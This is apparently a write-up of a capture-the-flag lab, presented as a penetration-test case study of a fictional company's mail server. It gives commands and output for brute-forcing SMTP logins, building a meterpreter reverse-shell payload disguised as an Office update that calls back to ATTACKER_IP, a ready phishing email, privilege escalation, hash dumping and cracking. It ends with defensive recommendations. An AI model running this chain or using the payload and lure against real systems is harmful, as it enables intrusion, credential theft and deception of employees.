You Got Mail
A detailed case study of exploiting an email server to gain unauthorized access — from reconnaissance to privilege escalation.
This case study documents a penetration test conducted against a company called Brik (brownbrick.co). The assessment included both passive reconnaissance of their web presence and active testing of their email infrastructure.
The scope included strictly passive reconnaissance on the domain brownbrick.co and active assessment on the target server. The goal was to identify vulnerabilities in their email system and demonstrate potential attack vectors.
Important Note
1. Reconnaissance
Website Analysis
The company website brownbrick.co revealed several key pieces of information:
- Company name: Brik (established 1950)
- Website designed by HTML Codex
- Team member information including emails
- Email format: firstname.lastname@brownbrick.co
Employee Information
The "Our Team" page revealed six employees with their email addresses:
Discovered Email Addresses:
oaurelius@brownbrick.co- Omar Aureliuswrohit@brownbrick.co- Winifred Rohitlhedvig@brownbrick.co- Laird Hedvigtchikondi@brownbrick.co- Titus Chikondipcathrine@brownbrick.co- Pontos Cathrinefstamatis@brownbrick.co- Filimena Stamatis
An Nmap scan of the target server revealed several open ports and services:
Email Services
- 25/TCPSMTP (hMailServer)
- 110/TCPPOP3 (hMailServer)
- 143/TCPIMAP (hMailServer)
- 587/TCPSMTP Submission
Windows Services
- 135/TCPMicrosoft RPC
- 139/TCPNetBIOS
- 445/TCPSMB
- 3389/TCPRDP
System Information
- Hostname:BRICK-MAIL
- OS:Windows Server
- Mail Server:hMailServer
Nmap scan report for BRICK-MAIL (10.10.X.X)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: TOP UIDL USER
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
3389/tcp open ms-wbt-server Microsoft Terminal Services
2. Credential Discovery
Custom Wordlist Generation
Using the website content to generate a custom wordlist with cewl:
$ cewl --lowercase https://brownbrick.co > passwords.txt
Notable words extracted:
Credential Brute Forcing
Using Hydra to brute force SMTP credentials with the discovered email addresses and generated wordlist:
$ hydra -L emails.txt -P passwords.txt smtp://10.10.X.X
Discovered Credentials:
lhedvig@brownbrick.co:bricks
3. Social Engineering Attack
Payload Creation
Creating a malicious payload disguised as an Office update using msfvenom:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=ATTACKER_IP LPORT=8888 \
-f exe -o OfficeUpdate.exe
Attack Strategy:
- Create a convincing malicious payload
- Craft a persuasive email that encourages recipients to run the attachment
- Use compromised email account to send the payload to other employees
- Set up a listener to catch incoming connections
Phishing Email
Using the compromised account to send a convincing phishing email to other employees:
Subject: Action Required: Office Update!
Hello,
I have recently been informed by IT that we need to immediately install the new Office update. For your convenience, I have attached the file below that will automatically update your machine. Please download and run the attached program.
Thanks,
Laird
$ msfconsole -q -x "use multi/handler; \
set payload windows/x64/meterpreter/reverse_tcp; \
set lhost ATTACKER_IP; \
set lport 8888; \
exploit"
Security Awareness Note
4. Initial Access & Privilege Escalation
Successful Compromise
The user wrohit (Winifred Rohit) opened the malicious attachment, giving us access to their system:
[+] Sending stage (200774 bytes) to 10.10.X.X
[+] Meterpreter session 1 opened (10.10.X.X:8888 → 10.10.X.X:49792)
meterpreter > getuid
Server username: BRICK-MAIL\wrohit
Privilege Escalation
Using Meterpreter's built-in privilege escalation techniques to gain SYSTEM access:
meterpreter > getsystem
... got system via technique 1 (Named Pipe Impersonation).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Privilege Escalation Vectors:
- Named Pipe Impersonation (successful)
- Token Duplication
- Secondary Logon Handle
The successful privilege escalation indicates that the system is missing important security patches or has misconfigured permissions.
5. Credential Harvesting
Windows Account Hashes
Using the hashdump command to extract password hashes from the system:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2dfe3378335d43f9764e581b856a662a:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
fstamatis:1009:aad3b435b51404eeaad3b435b51404ee:034c830cc313485a82e57a0d9dfa14e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
lhedvig:1010:aad3b435b51404eeaad3b435b51404ee:034c830cc313485a82e57a0d9dfa14e4:::
oaurelius:1011:aad3b435b51404eeaad3b435b51404ee:034c830cc313485a82e57a0d9dfa14e4:::
pcathrine:1012:aad3b435b51404eeaad3b435b51404ee:034c830cc313485a82e57a0d9dfa14e4:::
tchikondi:1013:aad3b435b51404eeaad3b435b51404ee:034c830cc313485a82e57a0d9dfa14e4:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
wrohit:1014:aad3b435b51404eeaad3b435b51404ee:8458995f1d0a4b0c107fb8e23362c814:::
Hash Cracking Results:
Using Hashcat to crack the extracted NTLM hashes:
$ hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
wrohit:superstar
Mail Server Credentials
Discovering the hMailServer administrative password hash in the configuration file:
meterpreter > cat "C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini"
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[Security]
AdministratorPassword=5f4dcc3b5aa765d61d8327deb882cf99
Hash Cracking Results:
Cracking the hMailServer administrator hash:
$ hashcat -m 0 admin_hash.txt /usr/share/wordlists/rockyou.txt
Administrator:password
Key Findings & Recommendations
Critical Vulnerabilities
Weak Password Policies
Multiple accounts using simple, easily guessable passwords.
Missing Security Patches
System vulnerable to privilege escalation via named pipe impersonation.
Insufficient Email Security
Email server allows sending executable attachments without filtering.
Poor Security Awareness
Users susceptible to basic social engineering attacks.
Security Recommendations
Implement Strong Password Policy
Enforce complex passwords with regular rotation and multi-factor authentication.
Regular Security Patching
Establish a routine patching schedule for all systems and applications.
Email Security Controls
Implement attachment filtering, sandboxing, and SPF/DKIM/DMARC.
Security Awareness Training
Conduct regular phishing simulations and security awareness sessions.
Based on TryHackMe's "You Got Mail" room
View Original Challenge